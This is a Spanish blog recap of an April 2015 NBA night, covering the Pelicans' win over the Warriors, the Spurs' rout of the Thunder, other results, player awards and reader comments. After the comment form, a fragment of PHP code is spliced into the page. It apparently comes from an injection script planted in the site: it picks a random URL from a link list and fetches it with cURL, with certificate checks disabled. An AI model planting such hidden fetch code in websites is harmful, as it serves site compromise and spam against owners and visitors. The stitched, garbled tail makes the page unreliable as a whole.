La Crónica: Golpe de timón

08 de April de 2015 por txusma

Tenemos nuevo inquilino para ese codiciado piso con vistas que es la octava posición del Oeste. Son los Pelicans, que dieron un golpe de timón a su temporada con una victoria de prestigio ante el que sería su rival en primera ronda en caso de confirmar la hazaña que supondría su clasificación para Playoffs. Lo hizo posible la cuarta derrota seguida de los Thunder, una minucia en manos de estos Spurs primaverales, que son una de las mejores maquinarias jamás creadas por el hombre. Los Heat descabalgaron a los Hornets de la lucha por los Playoffs del Este, los Clippers barrieron a los Lakers, Bhullar hizo historia en el Kings-Wolves y los Suns se hundieron con todo en su visita a Atlanta.

Y ahora, los detalles.

Golden State Warriors 100 – New Orleans Pelicans 103

Ante nada menos que los Warriors, el mejor equipo de la competición, el único por encima del 80% de victorias, lograron los Pelicans el asalto a la octava plaza del Oeste. Y lo hicieron de forma muy merecida. GSW salió al Smoothie King Center con el propósito de imponer la superioridad que se les supone y que se plasmó con un parcial 12-0 al final del primer cuarto y con tres triples consecutivos de Stephen Curry para llegar al descanso con 55-43 para los californianos. Por entonces, Anthony Davis apenas había dejado huella en el partido. La segunda mitad fue una historia bien diferente: The Brow comandó la remontada local, que de hecho ya era una realidad en un tercer cuarto dominado claramente por los Pelicans. No se rindieron los Warriors, ni siquiera tras verse 8 abajo a 6 minutos para el final, y con Bogut sosteniendo el fuerte en defensa y Curry & Green liderando la ofensiva, Golden State se puso +3 gracias a un parcial de 13-2. Pero los Pelicans, conscientes de lo que estaba en juego, disputaron mejor los últimos minutos, aprovecharon las pérdidas visitantes y vieron como el tiro de Stephen Curry que pudo forzar la prórroga se salió de dentro para sellar una victoria que no solo devuelve la octava plaza a manos de New Orleans sino que es una inyección de confianza brutal de cara a lo que resta de regular season y a un más que posible cruce de primera ronda entre ambos equipos.

San Antonio Spurs 113 – Oklahoma City Thunder 88

El ascenso de Pelicans a puestos de Playoffs llega a costa de los Thunder, derrotados por cuarto partido consecutivo y que no fueron rival para unos Spurs lanzados, en plena racha de victorias (8) y con las miras puestas en la segunda posición de la Conferencia. No es casualidad que el fabuloso momento de los Spurs llegue en vísperas de los Playoffs, como tampoco lo es que coincida con el florecer de Kawhi Leonard, excelso de nuevo anoche y que lleva un par de semanas recordándonos que es el vigente MVP de las Finales. Como viene siendo norma en la racha de los texanos, la defensa fue clave: no han encajado más de 93 puntos en ninguna de sus últimas victorias, y no permitieron que Westbrook desplegase su versión superheróica. De esta manera, y como viene siendo norma, no hubo emoción alguna: han ganado los ocho partidos por una diferencia media de casi 21 puntos. Y es que no falla: llega la primavera y, con ella, los mejores Spurs.

Resto de la jornada

Otro partido con mucha miga clasificatoria fue el que disputaron Heat y Hornets. La gran actuación de Dragic y un parcial 16-0 ayudaron a Miami a llevarse un triunfo (100-105) que les acerca a medio partido de la octava posición que ocupan los Celtics y deja en la cuneta a Charlotte. En Sacramento, con nada en juego salvo el honor, Wolves y Kings relajaron las defensas y permitieron el lucimiento de varios jugadores (ver Premios). Además, Sim Bullhar hizo historia. Ganaron los Kings (111-116), con lo que Minnesota sigue con muchas posibilidades de optar al pick #1 del draft. Otro aspirante, aunque menos, son los Lakers, barridos de nuevo por sus vecinos. Los Clippers no anduvieron tan sobrados ante los Lakers como en ocasiones recientes pero un gran Griffin y la anotación de Redick bastaron (100-105)  en el retorno de Crawford. El espanto de la jornada lo firmaron los Suns, incapaces de alcanzar los 70 puntos en Atlanta en una derrota (69-96) que dilapida de forma casi definitiva sus remotas posibilidades de hacerse con la octava posición del Oeste.

PREMIOS

MVP: En ausencia de DeMarcus Cousins, Rudy Gay asumió completamente el mando de las operaciones de los Kings. Se marcó un auténtico partidazo con 33 puntos, 7 rebotes y 5 asistencias.

Rookie: Vaya dueto el que formaron ayer Zach Lavine y Andrew Wiggins. El ganador de los mates se fue a los 21 puntos y 11 rebotes y el posiblemente mejor rookie del año anotó 26 puntos y capturó 8 rebotes.

Sorpresa: A Omri Casspi le ha sentado genial la llegada de George Karl al banquillo de los Kings. Han subido sus minutos y su rendimiento. Ayer anotó nada menos que 31 puntos, 16 en el tercer cuarto. Mike Muscala salió de inicio para los Hawks en sustitución de Millsap y acabó con 16 puntos (7 de 8 en TC) y 7 rebotes.

Decepción: Segundo mal partido consecutivo de Klay Thompson, segundo partido en que no es capaz de anotar más del 27% de sus tiros. Ayer se quedó en 7 puntos y además perdió 4 balones.

Esfuerzo en vano: Y completa el cuarteto de nominados de la orgía anotadora del Wolves – Kings Kevin Martin y sus 37 puntos, 8 asistencias y 5 rebotes. Debe de ser la primera vez que un mismo partido se lleva 4 de los 5 premios en juego.

TOP-10

 

Imágenes | AP Photos / Getty Images

Comenta

3 comentarios a esta entrada

  1. Blade Petrovic dice:
    #1

    Vaya lucha por los Playoffs nos esperan, me inclino por Pelicans, Nets y Celtics

      Citar

  2. Schize dice:
    #2

    Yo a los Pelicans les veo un calendario bastante más complicado que a Thunder. Lo veo difícil.

      Citar

  3. Ruxixón dice:
    #3

    Yo quiero Celtics y Nets dentro, y Thunder porque me da pena que Westbrook se quede fuera.Que si,Anthony Davis es la repera,pero quizás por estar más acostumbrado a echarle en falta a esas alturas no me pesaría tanto su ausencia.

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>